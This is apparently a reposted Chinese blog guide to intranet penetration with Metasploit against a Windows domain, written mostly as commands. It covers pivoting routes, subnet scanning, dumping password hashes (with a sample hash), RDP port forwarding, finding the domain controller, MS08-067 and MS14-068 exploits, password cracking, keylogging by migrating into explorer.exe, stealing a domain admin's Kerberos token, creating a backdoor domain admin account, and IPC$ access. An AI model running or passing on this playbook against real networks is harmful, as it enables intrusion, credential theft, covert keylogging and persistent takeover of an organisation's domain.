之前做內網滲透的時候用過,時間長了不用了,有點手生了。正好遇到 收藏一下!
MSF 下域內滲透實戰
先獲取域內機器session
run get_local_subnets //獲取本地網絡子網掩碼
route add 192.168.233.0 255.255.255.0 1 //添加路由表
run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一條靜態路由
run autoroute -s 192.168.2.0/24 //添加動態路由
route print //打印路由表
use auxliary/scanner/portscan/tcp //使用掃描模塊對整個 C 段跨網段掃描
use priv //運行注入
run post/windows/gather/hashdump //獲取用戶名 hash 值
Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
只要是管理員在線或者沒有注銷。我們可以抓取明文的
kerberos //管理員在線或者沒有注銷下獲取明文
3.收集域環境信息+找到域控
利用msf 的端口轉發功能來轉發一下,然后登入對方的遠程桌面看看。
meterpreter > portfwd add -l 2222 -r 127.0.0.1 -p 3389 //反彈 127.0.0.1 端口 3389 到本地 2222 並監聽
meterpreter > portfwd
root@kali:~# netstat -an | grep “2222”
root@kali:~# rdesktop 127.0.0.1:2222
成功登錄目標遠程桌面。
收集域的信息:
3.1.ipconfig /all
找到域控地址192.168.88.130
3. 2.net view
net view /domain //查看自己的有幾個域
注:一般 net view 服務器有簡單的備注信息如下:
\\dns dnsserver
\\sqldata sqlserver
\\mail exchage
\\oa oa server
比如 dns(一般為 DC 域控)
還有要是備注為 servidor master ad
3.3.ip 分析網絡結構
接下來一個一個 ping,或者直接寫腳本
3.4.用戶和組信息
net user
net user /domain – – 可以看到域的所有成員
net group “domain admins” /domain —— 查詢域管理員用戶組
我們可以在 net view 的解釋可以發現 要是備注為 servidor master ad 那它是域控可能性是很大的
由於 dns 一般就是域控。我們可以通過這個來找域控
還可以 nslookup 來找等等
3.5.搞定域控
1.溢出
ms08_067
要是局域網里面有 xp/2k 的那這個成功率比較高
但是我的域控是 2008
這里也可以用 ms14-068 進行普通域用戶提權為域管理員權限
2.DNS 溢出
DNS 服務器可能就是域控 so…
3.弱口令爆破
弱口令+已經控制的服務器口令+
將抓下的明文+一些常用弱口令。組合成字典去。
爆破局域網中存在數據庫服務器的主機
由於 2008 默認安全口令策略, 口令強度比較強 ,這個掃描就算吧
4.鍵盤記錄+3389 登入記錄
這個記錄了 在線管理員的 鍵盤記錄~
可以用 msf 的試試
最后將 msf 的進程轉移到 explorer.exe .這樣可以正常鍵盤記錄了
不轉移可能有一些莫名情況
ps //查看到 exploer.exe 進程為 3804
migrate 3804 //注入進程
keyscan_dump //進行鍵盤監控
5.假冒令牌
在假冒攻擊中 我們將盜取目標系統的一個 Kerberos 令牌,將其用在身份認證中。來假冒當初建立這個令牌的用戶。為了能夠獲取到域管理員的憑證我們需要用域管理員登錄一下遠程桌面。
meterpreter > use incognito //加載會話令牌模塊
meterpreter > list_tokens -u //列出會話令牌,需要管理員權限,如果是普通權限需要提權
看到 PAYLOAD\administrator 這個域管理員賬號,嘗試去盜取一下
meterpreter > impersonate_token PAYLOAD\\Administrator \\盜取 administrator 令牌
注意:PAYLOAD\Administrator中間需要多加一條右划線 \\
2.add_user admin Qwer1234!@#$ -h 192.168.88.130 有口令安全安全機制 口令復雜些就可以了
3.add_group_user “Domain Admins” admin -h 192.168.88.130 \\ 是將其加到域管理員中
注意:這里也可以用 mimikatz 直接獲取明文,只要域管理員遠程桌面登錄。
6.嗅探
用 cain.exe 吧 這個嗅探神器 = =,或者msf下的嗅探也可以
7. ipc$
net use \\192.168.88.130\c$ admin@123 /user:payload\administrator
net time \\192.168.88.130
